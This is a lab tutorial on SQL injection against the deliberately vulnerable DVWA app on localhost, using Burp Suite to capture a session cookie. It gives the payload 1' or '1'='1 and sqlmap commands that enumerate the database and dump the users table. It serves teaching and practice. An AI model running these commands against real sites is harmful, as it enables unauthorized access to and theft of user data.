SQli with Damn Vulnerable Web App (DVWA)
Damn Vulnerable Web App (DVWA)
Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a class room environment.
To Install the DvWA project follow the following page:
Burp suite
Burp Suite is a tool for performing penetration testing of web applications. With the Burp Suite, administrators can intercept and manipulate HTTP / HTTPS traffic to web applications before it is sent to the server. This enables security gaps in web applications to be discovered quickly and effectively.
To start intercepting web traffic, you have to set the proxy of the browser to 127.0.0.1:8080. The proxy listener is by default configured on 127.0.0.1:8080 in burp suite.
Browser
Proxy Settings in Browser
In this tutorial, it will be demonstrated how to configure the proxy settings in Firefox to work with Burp Suite. While this tutorial focuses on Firefox, similar steps can be followed for other browsers. Alternatively, the internal browser provided by Burp Suite can be used to intercept traffic directly.
Steps to Set Up the Proxy in Firefox
- Open Firefox and type
about:preferencesinto the address bar. - Navigate to the General tab.
- Scroll to the bottom of the page and locate the Network Settings section.
- Click on the Settings... button.
Configuring the Proxy
In the Network Settings window:
- Select the option to configure a manual proxy.
- Enter the IP address and port of the Burp Suite proxy server into the respective fields. Typically, the default values are:
* IP Address:127.0.0.1* Port:8080
- Ensure that "Use this proxy server for all protocols" is checked.
- Click OK to save the settings.
Configuring Localhost Traffic
To ensure that traffic destined for localhost (e.g., self-hosted applications like DVWA) is also routed through the proxy server:
- Type
about:configinto the address bar and press Enter. - In the configuration window, search for
network.proxy.testing_localhost_is_secure_when_hijacked. - Set this preference to true by double-clicking on it or using the toggle button.
SQL Injection
In the DVWA project move to "SQL Injection" and type in the following input as User ID:
1' or '1'='1
This will deliver all users stored in the database as the condition is always true.
Afterwards when switching to burp suite tab "Proxy" -> History you will see that the request has been captured. Within the request the "PHPSESSID" will be included as part of the cookie.
With this sessionid it is possible to connect to database and get further information with the help of a third tool called "sqlmap". To get the databases within DBMS system use the following command:
sqlmap -u "http://localhost/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit" "--cookie=security=<e.g. medium>; PHPSESSID=<SessionID>" --dbs
To retrieve the tables of a specific database for example dvwa database. Replace the "--dbs" option with the "--tables" and "-D" option and define the database.
sqlmap -u "http://localhost/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit" "--cookie=security=low; PHPSESSID=t664gnfopfo6kem1nkon3a6kvb" --tables -D dvwa
Furthermore, it is possible to see the database schema from database "dvwa" as well by executing the following command:
sqlmap -u "http://localhost/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit" "--cookie=security=low; PHPSESSID=t664gnfopfo6kem1nkon3a6kvb" --columns -D dvwa -T users
At the end to get to the sensitive data the attacker will execute the command:
sqlmap -u "http://localhost/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit" "--cookie=security=low; PHPSESSID=t664gnfopfo6kem1nkon3a6kvb" --dump -D dvwa -T users
